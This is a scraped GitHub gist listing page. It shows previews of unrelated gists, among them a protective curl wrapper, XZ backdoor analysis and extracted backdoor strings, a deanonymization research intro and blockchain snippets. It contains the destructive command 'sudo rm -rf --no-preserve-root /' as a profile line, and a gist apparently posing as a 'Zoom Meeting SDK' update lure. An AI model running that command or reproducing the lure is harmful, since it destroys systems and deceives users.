💯
Percent Commitment

sudo rm -rf --no-preserve-root / pcaversaccio

@pcaversaccio
pcaversaccio / curl
Last active January 18, 2026 14:28
Protective wrappers for `curl`/`wget` that prevent homograph/IDN attacks by blocking URLs containing non-ASCII characters or Punycode domains.
#!/usr/bin/env bash
set -Eeuo pipefail
RED=$'\033[1;31m'
YELLOW=$'\033[1;33m'
RESET=$'\033[0m'
for arg in "$@"; do
# Reject any non-ASCII byte.
if LC_ALL=C printf "%s" "$arg" | grep -q "[^ -~]"; then
###############################################################
# #
# Zoom Meeting SDK Support #
# #
# A new version of the Zoom Web App will be released soon. #
# In the meantime, you can update the Zoom Meeting SDK manually. #
# Press ▶️ to start the update. #
# #
# Copyright (c) 2025 Zoom Community #
# #
@pop-punk
pop-punk / useBondingCurveBuy.ts
Last active February 19, 2025 11:39
Safe Abstract Session Keys
import { usePublicClient } from "./usePublicClient";
import { IToken } from "@/types/token";
import { parseAbi, parseEther } from "viem";
import { ethers } from "ethers";
import { useAbstractClient } from "@abstract-foundation/agw-react";
import { useAbstractSession } from "@/hooks/useCreateAbstractSession";
import { privateKeyToAccount } from "viem/accounts";
import { useSessionClientChain } from "./useSessionClientChain";
export const useBondingCurveBuy = (chain: any) => {
@hackermondev
hackermondev / research.md
Last active January 20, 2026 22:33
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platform

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

@0xngmi
0xngmi / potential-bad-domains.txt
Last active September 7, 2025 11:10
List of domains associated with squarespace at risk of being hacked
List of domains that are registered with squarespace and thus could be vulnerable:
// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.7.0 <0.9.0;
/**
* Workaround example on how to inject and execute arbitrary bytecode in solidity contract
* Currently only YUL supports verbatim: https://github.com/ethereum/solidity/issues/12067
* But you cannot import Solidity code in YUL, or YUL code in solidity, so this workaround is necessary.
* It works as long the byte sequence `0x7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F7F00` appear in the runtime code.
*
There appears to be a string encoded in the binary payload:
https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01#file-hashes-txt-L115
Which functions as a killswitch:
https://piaille.fr/@zeno/112185928685603910
Thus, one workaround for affected systems might be to add this to `/etc/environment`:
```
@smx-smx
smx-smx / XZ Backdoor Analysis
Last active December 18, 2025 02:06
[WIP] XZ Backdoor Analysis and symbol mapping
XZ Backdoor symbol deobfuscation. Updated as I make progress
@q3k
q3k / hashes.txt
Last active October 21, 2025 14:24
liblzma backdoor strings extracted from 5.6.1 (from a built-in trie)
0810 b' from '
0678 b' ssh2'
00d8 b'%.48s:%.48s():%d (pid=%ld)\x00'
0708 b'%s'
0108 b'/usr/sbin/sshd\x00'
0870 b'Accepted password for '
01a0 b'Accepted publickey for '
0c40 b'BN_bin2bn\x00'
06d0 b'BN_bn2bin\x00'
0958 b'BN_dup\x00'
@ulerdogan
ulerdogan / p256verify.sh
Created February 7, 2024 22:27
Testing command for RIP-7212
RPC="https://polygon-mumbai.blockpi.network/v1/rpc/public"
P256VERIFY="0x0000000000000000000000000000000000000100"
CALLDATA="4cee90eb86eaa050036147a12d49004b6b9c72bd725d39d4785011fe190f0b4da73bd4903f0ce3b639bbbf6e8e80d16931ff4bcf5993d58468e8fb19086e8cac36dbcd03009df8c59286b162af3bd7fcc0450c9aa81be5d10d312af6c66b1d604aebd3099c618202fcfe16ae7770b0c49ab5eadf74b754204a3bb6060e44eff37618b065f9832de4ca6ca971a7a1adc826d0f7c00181a5fb2ddf79ae00b4e10e"
echo "testing RIP-7212 on Mumbai"
cast call --rpc-url "${RPC}" "${P256VERIFY}" --data "${CALLDATA}"